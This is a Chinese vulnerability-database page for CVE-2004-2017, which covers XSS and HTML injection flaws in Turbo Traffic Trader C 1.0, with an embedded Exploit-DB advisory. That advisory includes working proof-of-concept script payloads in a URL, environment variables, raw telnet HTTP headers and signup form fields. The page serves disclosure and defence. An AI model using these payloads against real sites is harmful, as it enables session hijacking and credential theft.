CVE-2004-2017
CVSS4.3
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:04:55
NMCOE    

[原文]Multiple cross-site scripting (XSS) vulnerabilities in Turbo Traffic Trader C (TTT-C) 1.0 allow remote attackers to inject arbitrary HTML or web script, as demonstrated via (1) the link parameter to ttt-out, (2) the X-Forwarded-For header in a GET request to ttt-in, (3) the Referer header in a GET request to ttt-in, or the (4) site name or (5) site URL fields in the main control panel.


[CNNVD]TurboTrafficTrader C多个跨站脚本和HTML注入漏洞(CNNVD-200412-842)

        Turbo Traffic Trader C (TTT-C) 1.0版本存在多个跨站脚本(XSS)漏洞。远程攻击者可以借助该漏洞注入任意HTML或web脚本。正如通过(1)ttt-out的连接参数,(2)ttt-in GET请求的X-Forwarded-For头,(3)ttt-in GET请求的Referer头或(4)站点名或(5)主控板的站点URL字段。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2017
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2017
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-842
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108481571131866&w=2
(UNKNOWN)  BUGTRAQ  20040517 Multiple TTT-C XSS vulnerabilities
http://www.securityfocus.com/bid/10359
(UNKNOWN)  BID  10359
http://xforce.iss.net/xforce/xfdb/16164
(UNKNOWN)  XF  turbotraffictraderc-multiple-xss(16164)

- 漏洞信息

TurboTrafficTrader C多个跨站脚本和HTML注入漏洞
中危 跨站脚本
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Turbo Traffic Trader C (TTT-C) 1.0版本存在多个跨站脚本(XSS)漏洞。远程攻击者可以借助该漏洞注入任意HTML或web脚本。正如通过(1)ttt-out的连接参数,(2)ttt-in GET请求的X-Forwarded-For头,(3)ttt-in GET请求的Referer头或(4)站点名或(5)主控板的站点URL字段。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24122)

TurboTrafficTrader C 1.0 Multiple Cross-Site Scripting and HTML Injection Vulnerabilities (EDBID:24122)
cgi webapps
2004-05-17 Verified
0 Kaloyan Olegov Georgiev
N/A [点击下载]
source: http://www.securityfocus.com/bid/10359/info

It has been reported that TurboTrafficTrader C does not properly sanitize input received from users. It has been conjectured that this may allow a remote user to launch cross-site scripting and HTML injection attacks.

The cross-site scripting issues could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.

The HTML injection issues could allow an attacker to post malicious HTML and script code that would then later be rendered in the web browser of further visitors to the affected site.

These attacks would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials. Other attacks are also possible.

http://www.example.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.example.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>

export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
./ttt-in will load one bad record for IP
export HTTP_X_FORWARDED_FOR="10.0.0.1<script>alert('proxy insertion');</script>" 
./ttt-in will load an XXSed proxy record

Raw connection example:
telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.example.com

telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.example.com

When signing up for a new account:
Site name = Name"<script>window.open('http://www.example.com');</script>
Site URL = http://www.example.com"<script>alert('name_inject');</script>
Webmaster e-mail = email@example.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>		

- 漏洞信息

6339
TTT-C ttt-out Link Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Turbo Traffic Trader C (TTT-C) contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "link" variables upon submission to the "ttt-out" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-05-16 Unknow
2004-05-16 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站